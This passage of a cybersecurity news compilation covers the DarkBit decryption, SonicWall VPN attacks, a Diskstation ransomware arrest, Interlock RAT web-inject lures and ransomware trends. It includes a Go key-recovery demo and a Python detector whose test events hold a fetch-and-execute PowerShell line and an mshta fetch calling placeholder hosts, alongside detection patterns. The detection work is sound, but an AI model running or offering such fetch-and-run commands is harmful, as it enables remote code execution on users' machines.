The breach highlights the growing risks ransomware attacks pose to global enterprises, particularly those handling large volumes of sensitive employee and client data. It also reflects how threat actors like RansomHub continue to exploit vulnerabilities in third-party and subsidiary operations, targeting organizations indirectly when direct access to corporate systems is more difficult.

Profero Cracks DarkBit Ransomware Encryption After Israel-Iran Cyberattack Links


Cybersecurity company Profero managed to break the encryption scheme used by the DarkBit ransomware group, allowing victims to restore their systems without having to pay a ransom. This achievement came during a 2023 incident response investigation, when Profero was called in to assist a client whose VMware ESXi servers had been locked by the malware. 

The timing of the breach coincided with escalating tensions between Israel and Iran, following drone strikes on an Iranian Defense Ministry weapons facility, raising suspicions that the ransomware attack had political motivations. The attackers behind the campaign claimed to represent DarkBit, a group that had previously posed as pro-Iranian hacktivists and had targeted Israeli universities. Their ransom messages included strong anti-Israel rhetoric and demanded payments amounting to 80 Bitcoin. 

Israel’s National Cyber Command later attributed the operation to MuddyWater, a well-known Iranian state-backed advanced persistent threat group that has a history of conducting espionage and disruption campaigns. Unlike conventional ransomware operators who typically pursue ransom negotiations, the DarkBit actors appeared less concerned with money and more focused on causing business disruption and reputational harm, signaling motivations that aligned with state-directed influence campaigns. 

When the attack was discovered, no publicly available decryptor existed for DarkBit. To overcome this, Profero researchers analyzed the malware in detail and found flaws in its encryption process. DarkBit used AES-128-CBC keys created at runtime, which were then encrypted with RSA-2048 and appended to each locked file. However, the method used to generate encryption keys lacked randomness. By combining this weakness with encryption timestamps gleaned from file modification data, the researchers were able to shrink the possible keyspace to just a few billion combinations—far more manageable than expected. 

The team further capitalized on the fact that Virtual Machine Disk (VMDK) files, common on ESXi servers, include predictable header bytes. Instead of brute forcing an entire file, they only needed to check the first 16 bytes to validate potential keys. Profero built a custom tool capable of generating key and initialization vector pairs, which they tested against these known file headers in a high-powered computing environment. This method successfully produced valid decryption keys that restored locked data. 
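The key-recovery approach described above, as an added example that is neither Profero's tool nor DarkBit's code: the key generator below is a constructed stand-in for a low-entropy, timestamp-seeded derivation, the 16-byte VMDK header is constructed around the real "KDMV" magic bytes, and the search window is kept deliberately small so the demonstration runs in milliseconds rather than over billions of candidates.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/binary"
	"fmt"
	"math/rand"
)

// knownHeader is a constructed 16-byte stand-in for the start of a VMDK sparse extent:
// the real format opens with the magic bytes "KDMV"; the remaining bytes here are made up.
var knownHeader = []byte("KDMV\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00")

// deriveKeyIV is a constructed stand-in for a low-entropy key generator, NOT DarkBit's real
// code. It models only the property the write-up describes: the AES-128 key and IV are a
// deterministic function of a guessable seed (a Unix timestamp plus a small counter).
func deriveKeyIV(ts int64, counter uint32) (key, iv []byte) {
	r := rand.New(rand.NewSource(ts*4096 + int64(counter)))
	key = make([]byte, 16)
	iv = make([]byte, 16)
	for i := 0; i < 16; i += 8 {
		binary.LittleEndian.PutUint64(key[i:], r.Uint64())
		binary.LittleEndian.PutUint64(iv[i:], r.Uint64())
	}
	return key, iv
}

// cbc runs AES-128-CBC over data (length must be a multiple of 16) in the given direction.
func cbc(key, iv, data []byte, encrypt bool) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	if len(data)%aes.BlockSize != 0 {
		return nil, fmt.Errorf("data length %d is not a multiple of the block size", len(data))
	}
	out := make([]byte, len(data))
	if encrypt {
		cipher.NewCBCEncrypter(block, iv).CryptBlocks(out, data)
	} else {
		cipher.NewCBCDecrypter(block, iv).CryptBlocks(out, data)
	}
	return out, nil
}

// recoverKeyIV searches the candidate seeds implied by a file's modification time: every
// timestamp from mtime-window to mtime, each combined with counters 0..maxCounter.
// A candidate is accepted only if decrypting the first 16 ciphertext bytes yields the
// known VMDK header, so only one AES block is processed per candidate.
func recoverKeyIV(firstBlock []byte, mtime, window int64, maxCounter uint32) (key, iv []byte, tried int, ok bool) {
	for ts := mtime - window; ts <= mtime; ts++ {
		for c := uint32(0); c <= maxCounter; c++ {
			tried++
			k, v := deriveKeyIV(ts, c)
			pt, err := cbc(k, v, firstBlock[:aes.BlockSize], false)
			if err == nil && bytes.Equal(pt, knownHeader) {
				return k, v, tried, true
			}
		}
	}
	return nil, nil, tried, false
}

// encryptSample builds a constructed "victim file": the known header followed by two
// blocks of payload, encrypted with the weak generator at a fixed timestamp and counter.
func encryptSample(ts int64, counter uint32) (plain, ct []byte) {
	plain = append([]byte{}, knownHeader...)
	plain = append(plain, bytes.Repeat([]byte("disk-payload-data"), 2)[:32]...)
	key, iv := deriveKeyIV(ts, counter)
	ct, _ = cbc(key, iv, plain, true)
	return plain, ct
}

func main() {
	const seedTime, seedCounter = 1700000000, 42 // constructed values
	plain, ct := encryptSample(seedTime, seedCounter)

	// The responder knows only the ciphertext, an mtime close to the encryption time and
	// the header format; the 60-second window stands in for the much larger real keyspace.
	key, iv, tried, ok := recoverKeyIV(ct, seedTime+10, 60, 100)
	if !ok {
		fmt.Println("no candidate matched the VMDK header within the window")
		return
	}
	recovered, _ := cbc(key, iv, ct, false)
	fmt.Printf("matched after %d candidates; full file restored: %v\n", tried, bytes.Equal(recovered, plain))
}
```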

At the same time, Profero noticed that DarkBit’s encryption technique was incomplete, leaving many portions of files untouched. Since VMDK files are sparse and contain large amounts of empty space, the ransomware often encrypted irrelevant sections while leaving valuable data intact. By carefully exploring the underlying file systems, the team was able to retrieve essential files directly, without requiring full decryption. This dual approach allowed them to recover critical business data and minimize the impact of the attack.  

Researchers noted that DarkBit’s strategy was flawed, as a data-wiping tool would have been more effective at achieving its disruptive aims than a poorly implemented ransomware variant. The attackers’ refusal to negotiate further reinforced the idea that the campaign was intended to damage operations rather than collect ransom payments. Profero has chosen not to release its custom decryptor to the public, but confirmed that it is prepared to help any future victims affected by the same malware.  

The case illustrates how weaknesses in ransomware design can be turned into opportunities for defense and recovery. It also highlights how cyberattacks tied to international conflicts often blur the line between criminal extortion and state-backed disruption, with groups like DarkBit using the guise of hacktivism to amplify their impact.

SonicWall VPN Zero-Day Vulnerability Suspected Amid Rising Ransomware Attacks


Virtual Private Networks (VPNs) have recently been in the spotlight due to the U.K.’s Online Safety Act, which requires age verification for adult content websites. While many consumers know VPNs as tools for bypassing geo-restrictions or securing public Wi-Fi connections, enterprise-grade VPN appliances play a critical role in business security. 

When researchers issue warnings about possible VPN exploitation, the risk cannot be dismissed. SonicWall has addressed growing concerns after reports surfaced of ransomware groups targeting its devices. According to the company, an investigation revealed that the activity is linked to CVE-2024-40766, a previously disclosed vulnerability documented in its advisory SNWLID-2024-0015, rather than an entirely new zero-day flaw. Fewer than 40 confirmed cases were reported, mostly tied to legacy credentials carried over from firewall migrations. 

Updated guidance includes credential changes and upgrading to SonicOS 7.3.0 with enhanced multi-factor authentication (MFA) protections. Despite these reassurances, Arctic Wolf Labs researcher Julian Tuin observed a noticeable increase in ransomware activity against SonicWall firewall devices in late July. 

Several incidents involved VPN access through SonicWall SSL VPNs. While some intrusions could be explained by brute force or credential stuffing, evidence suggests the possibility of a zero-day vulnerability, as some compromised devices had the latest patches and rotated credentials. 

In several cases, even with TOTP MFA enabled, accounts were breached. SonicWall confirmed it is working closely with threat research teams, including Arctic Wolf, Google Mandiant, and Huntress, to determine whether the incidents are tied to known flaws or a new vulnerability. If a zero-day is confirmed, updated firmware and mitigation steps will be released promptly. 

The urgency is amplified by the involvement of the Akira ransomware group, which has compromised over 300 organizations globally. SonicWall also recently warned of CVE-2025-40599, a serious remote code execution vulnerability in SMA 100 appliances. Experts advise organizations to take immediate precautionary steps, especially given the potential for severe operational disruption. 

Recommended mitigations include disabling SSL VPN services where possible, restricting VPN access to trusted IP addresses, enabling all security services such as botnet protection and geo-IP filtering, removing inactive accounts, enforcing strong password policies, and implementing MFA for all remote access. 

However, MFA alone may not be sufficient in the current threat scenario. The combination of suspected zero-day activity, ransomware escalation, and the targeting of critical remote access infrastructure means that proactive defense measures are essential. 

SonicWall and security researchers continue to monitor the situation closely, urging organizations to act quickly to protect their networks before attackers exploit potential vulnerabilities further.

Romanian Arrested in Diskstation Ransomware Operation Targeting Synology NAS Devices


A 44-year-old Romanian national has been arrested as part of a coordinated international law enforcement effort to take down the cybercriminal group behind the Diskstation ransomware campaign. This group is known for targeting Synology Network-Attached Storage (NAS) devices, which are widely used by businesses and organizations for centralized file storage, data backups, and hosting. These attacks have primarily affected entities operating in enterprise environments, where NAS systems are critical to daily operations. 

The Diskstation ransomware group has operated under several aliases, including DiskStation Security, Quick Security, 7even Security, Umbrella Security, and LegendaryDisk Security. Since its emergence in 2021, the group has engaged in multiple ransomware campaigns, encrypting data on NAS devices and demanding cryptocurrency payments in exchange for decryption keys. 

Victims have included international organizations involved in civil rights advocacy, film production, and event management. These attacks left many victims unable to continue operations unless they agreed to pay substantial ransoms. Authorities in Italy launched an investigation after numerous companies in the Lombardy region reported ransomware attacks that rendered their data inaccessible. 

The attackers demanded payments in cryptocurrency, prompting investigators to analyze the affected systems and blockchain transactions. This digital trail eventually led police across borders, uncovering connections in both France and Romania. The operation, dubbed “Elicius,” was coordinated by Europol and culminated in a series of raids in Bucharest in June 2024. During these raids, several individuals believed to be involved in the Diskstation campaign were identified. One suspect was caught in the act of committing a cybercrime. 

The 44-year-old man who was arrested is now in custody and faces charges including unauthorized access to computer systems and extortion. While the Diskstation name is often associated with Synology’s NAS products, this specific campaign received little attention from mainstream cybersecurity outlets. 

However, it caused significant disruption to organizations worldwide. The ransomware gang reportedly demanded payments ranging from $10,000 to several hundred thousand dollars, depending on the organization’s size and data sensitivity. Law enforcement agencies continue to investigate the broader network behind the Diskstation operation. 

The case underscores the growing threat of ransomware campaigns targeting critical infrastructure and storage solutions. As attackers evolve their methods and target widely used systems like Synology NAS, cybersecurity vigilance remains crucial for all organizations, regardless of size or industry.

Interlock RAT Evolves in New KongTuke Web-Inject Attacks Targeting U.S. Industries


A recently enhanced version of the Interlock remote access Trojan (RAT) is being deployed in an ongoing web-inject campaign linked to the ransomware group behind it. Known for its double-extortion tactics, Interlock has now shifted its technical approach with a more covert RAT variant written in PHP. According to a new report by The DFIR Report, this marks a significant advancement in the group’s capabilities and strategy.  

Interlock first emerged in late 2024, attacking high-profile targets such as Texas Tech University’s Health Sciences Centers. Earlier this year, cybersecurity firm Quorum Cyber detailed two versions of the group’s malware, named NodeSnake, focused on maintaining persistence and exfiltrating data. The newest version introduces additional stealth features, most notably a transition from JavaScript to PHP, allowing the malware to blend more easily with normal web traffic and avoid detection. 

This enhanced RAT is tied to a broader web-inject threat campaign dubbed “KongTuke,” where victims are tricked into running malicious scripts after visiting compromised websites. Visitors encounter what appears to be a legitimate CAPTCHA but are actually prompted to paste dangerous PowerShell commands into their systems. This action initiates the Interlock RAT, giving attackers access to the machine. 

Once activated, the malware gathers extensive data on the infected system. Using PowerShell, it collects system information, running processes, mounted drives, network connections, and checks its own privilege level. This enables attackers to evaluate the environment quickly and plan further intrusion tactics. It then connects back to command-and-control infrastructure, leveraging services like Cloudflare Tunneling for stealthy communication. Remote desktop protocol (RDP) is used for lateral movement and persistent access. 

Researchers say the targeting in this campaign appears opportunistic, not industry-specific. Victims across various sectors in the U.S. have been identified, with the attackers casting a wide net and focusing efforts where systems and data seem valuable or more vulnerable.  

Defensive recommendations from experts include improving phishing awareness, restricting the use of the Windows Run dialog box, enforcing least privilege access, and requiring multifactor authentication. Blocking unnecessary use of RDP is also essential. 
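As an added illustration of the detection side of these recommendations (not code from The DFIR Report or the original post), the following Python flags process-creation events that match the paste-and-run pattern described above: a script host spawned directly by explorer.exe, which hosts the Run dialog, with a hidden window, a remote fetch, in-memory evaluation or an encoded command. The events, field names, paths and domains are constructed for the example.

```python
import re

# Constructed Sysmon-style process-creation events; field names, paths and
# domains are assumptions for this example, not telemetry from the campaign.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -NoProfile -c "iex (irm http://captcha.example.invalid/v)"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -NoProfile -File C:\Scripts\backup.ps1"},
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -EncodedCommand QUFBQUFBQUE="},  # placeholder blob (base64 of "AAAAAAAA")
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://verify.example.invalid/c"},
]

# Script hosts a user can be talked into launching from the Run dialog.
SHELL_IMAGES = re.compile(r"\\(powershell|pwsh|mshta|cmd)\.exe$", re.I)

# Command-line traits typical of paste-and-run lures: hide the window, fetch
# remote content, evaluate it in memory, or hide the script in base64.
SUSPICIOUS = {
    "hidden window": re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I),
    "remote fetch": re.compile(r"\b(irm|iwr|invoke-(restmethod|webrequest)|downloadstring|mshta\s+https?:)", re.I),
    "in-memory eval": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "encoded command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}", re.I),
}

def classify(event):
    """Reasons an event matches the Run-dialog paste-and-run pattern; [] if benign."""
    if not SHELL_IMAGES.search(event["image"]):
        return []
    reasons = [name for name, rx in SUSPICIOUS.items() if rx.search(event["cmdline"])]
    # explorer.exe hosts the Run dialog, so a script host spawned directly under
    # it with these traits is the user-pasted launch the fake CAPTCHA aims for.
    if reasons and event["parent"].lower().endswith(r"\explorer.exe"):
        reasons.insert(0, "spawned from explorer.exe (Run dialog / Win+R)")
    return reasons

def find_suspicious(events):
    """Map each flagged command line to the reasons it was flagged."""
    return {e["cmdline"]: r for e in events if (r := classify(e))}

if __name__ == "__main__":
    for cmdline, reasons in find_suspicious(SAMPLE_EVENTS).items():
        print(f"ALERT: {cmdline}\n  -> {', '.join(reasons)}")
```

The non-explorer.exe encoded-command event is still reported, but without the Run-dialog reason, so a triage rule can weight the two cases differently.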

The growing sophistication of the Interlock RAT and its integration into mass web-inject campaigns reflects an evolving cyber threat landscape where stealth, automation, and social engineering play a central role.

Why Major Companies Are Still Falling to Basic Cybersecurity Failures


In recent weeks, three major companies—Ingram Micro, United Natural Foods Inc. (UNFI), and McDonald’s—faced disruptive cybersecurity incidents. Despite operating in vastly different sectors—technology distribution, food logistics, and fast food retail—all three breaches stemmed from poor security fundamentals, not advanced cyber threats. 

Ingram Micro, a global distributor of IT and cybersecurity products, was hit by a ransomware attack in early July 2025. The company’s order systems and communication channels were temporarily shut down. Though systems were restored within days, the incident highlights a deeper issue: Ingram had access to top-tier security tools, yet failed to use them effectively. This wasn’t a tech failure—it was a lapse in execution and internal discipline. 

Just two weeks earlier, UNFI, the main distributor for Whole Foods, suffered a similar ransomware attack. The disruption caused significant delays in food supply chains, exposing the fragility of critical infrastructure. In industries that rely on real-time operations, cyber incidents are not just IT issues—they’re direct threats to business continuity. 

Meanwhile, McDonald’s experienced a different type of breach. Researchers discovered that its AI-powered hiring tool, McHire, could be accessed using a default admin login and a weak password—“123456.” This exposed sensitive applicant data, potentially impacting millions. The breach wasn’t due to a sophisticated hacker but to oversight and poor configuration. All three cases demonstrate a common truth: major companies are still vulnerable to basic errors. 

Threat actors like SafePay and Pay2Key are capitalizing on these gaps. SafePay infiltrates networks through stolen VPN credentials, while Pay2Key, allegedly backed by Iran, is now offering incentives for targeting U.S. firms. These groups don’t need advanced tools when companies are leaving the door open. Although Ingram Micro responded quickly—resetting credentials, enforcing MFA, and working with external experts—the damage had already been done. 

Preventive action, such as stricter access control, routine security audits, and proper use of existing tools, could have stopped the breach before it started. These incidents aren’t isolated—they’re indicative of a larger issue: a culture that prioritizes speed and convenience over governance and accountability. 

Security frameworks like NIST or CMMC offer roadmaps for better protection, but they must be followed in practice, not just on paper. The lesson is clear: when organizations fail to take care of cybersecurity basics, they put systems, customers, and their own reputations at risk. Prevention starts with leadership, not technology.

Ransomware Attacks Continue to Rise in an Alarming Trend


The frequency and intensity of cyberthreats seem to be increasing despite businesses' ongoing efforts to thwart malicious actors. Honeywell, a global technology and manufacturing firm that also provides cybersecurity solutions, reported a 46% rise in ransomware extortion attacks between October 1, 2024, and March 31, 2025, as compared to the previous six-month period. 

Win32.Worm.Ramnit, a Trojan that typically targets the banking sector to steal account details, was found in 37% of files blocked by Honeywell's SMX product. That represented a 3,000% rise from the second quarter of 2024, when Honeywell last reported on it. 

In its investigation report, Honeywell stated that "it can likely be assumed it has been repurposed to extract control system credentials" due to the Trojan's saturation presence in the ecosystems of its industrial clients. "Existing adversaries continue to disrupt operations across critical sectors, even in the absence of new ransomware variants specifically designed for industrial control systems." 

A total of 1,929 ransomware incidents were made public during the reporting period. Eight verticals accounted for the vast majority (71%) of the cases, with the industries most affected being manufacturing, construction, healthcare, and technology. 

Given that ransomware attacks are normally "more opportunistic, typically creating a normal distribution of attacks across different industries," Honeywell noted that this concentration was an unusual pattern. The report claims that supply chain disruptions, manual failovers, and forced production outages caused by ransomware have been experienced by manufacturing plants, water treatment facilities, and energy providers. 

In response to the elevated threats, during the reporting period, some organisations "doubled down on best practices that would be considered baseline," according to Honeywell. Such procedures include, for example, immutable data backups and regular vulnerability assessments. According to Honeywell, as of October 2024, victimised organisations had paid out more than $1 billion in ransoms. 

Another new cybersecurity report, from the Information Security Media Group, focused on artificial intelligence, which it described as the "defining force" of cybersecurity-related disruption. 

As businesses use AI to automate threat detection and scale response capabilities, "adversaries are using the same technologies to enhance phishing, generate polymorphic malware, and conduct identity fraud with unprecedented precision," according to the ISMG research. ISMG added that the combination of AI and quantum computing "further signals a critical shift requiring crypto-agility and forward planning."